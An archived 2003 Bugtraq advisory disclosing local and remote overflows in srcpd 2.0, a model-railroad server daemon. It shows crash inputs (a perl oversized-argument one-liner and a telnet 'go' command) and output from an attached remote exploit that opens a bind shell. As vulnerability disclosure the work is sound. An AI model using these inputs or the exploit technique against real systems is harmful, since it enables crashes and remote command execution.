lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <1943489910.20030821160846@mail.ru>
Date: Thu, 21 Aug 2003 16:08:46 +0400
From: Over_G <overg@...l.ru>
To: bugtraq@...urityfocus.com
Subject: [m00 SA001]: Buffer overflows in srcpd

/***********************************************
*
*            m00 security advistory #001
*
*          Buffer overflows in Srcpd v2.0
*
*              www.m00security.org
*
*       overg[at]mail.ru    h0snp[at]mail.ru
*
************************************************/

---------------------------------------
Product: srcpd
Version: 2.0 (other ?)
OffSite: http://srcpd.sourceforge.net
Problem: buffer & integer overflows.
---------------------------------------

Vulnerability file:
/usr/sbin/srcpd


Description the package:

The srcpd is a server daemon that enables
you to control and play with a digital model
railroad using any SRCP Client. Actually 
it supports an Intellibox (tm), a Marklin
Interface 6050 or 6051 (tm?), and many more 
interfaces. More information about SRCP and 
links to many really cool clients (and other 
servers for different hardware) can be found 
at http://srcpd.sourceforge.net and 
http://www.der-moba.de/Digital 
This is a beta release, do not use for production!

SRCP - Simple Railroad Command Protocol.


1. Local buffer overflow.

In File srcpd.c length 'conffile' = MAXPATHLEN.
If 'conffile' > MAXPATHLEN then srcpd is 'crashed'.

[over@...alhost m00]$ /usr/sbin/srcpd -f `perl -e 'print "A" x 10000'`

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 1197)]
0x420d2a44 in _getopt_internal () from /lib/i686/libc.so.6


2. Remote integer overflow.

[over@...alhost m00]$ telnet localhost 12340
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
srcpd V2; SRCP 0.8.2
go 11111111
1060333759.411 200 OK GO 1
go 11111111
Connection closed by foreign host.

[over@...alhost m00]$ telnet localhost 12340
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused


3. Remote stack overflow/command execution.

There are multiply stack overflow vulnerabilities in method
handlers. For example, handleSET() , handleGET() and other. 
Therefore we can smash the stack and get a shell.
See code for more info...

Remote exploit attached.

example:

[h0snp@...3 srcpd]$ ./m00-srcpd -h localhost -t 0
 ** ***************************************** **
 ** Srcpd v2.0 remote exploit by m00 Security **
 ** ***************************************** **
 Conneting...OK
 using RET = 0xbf1fcb61
 now, if you was lucky with ret, shell spawned on 26112.
[h0snp@...3 srcpd]$ telnet localhost 26112
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
id;
uid=500(h0snp) gid=500(h0snp) groups=500(h0snp)


(c) m00 Security / Over_G & h0snp
Download attachment "m00-srcpd.c" of type "application/octet-stream" (3940 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ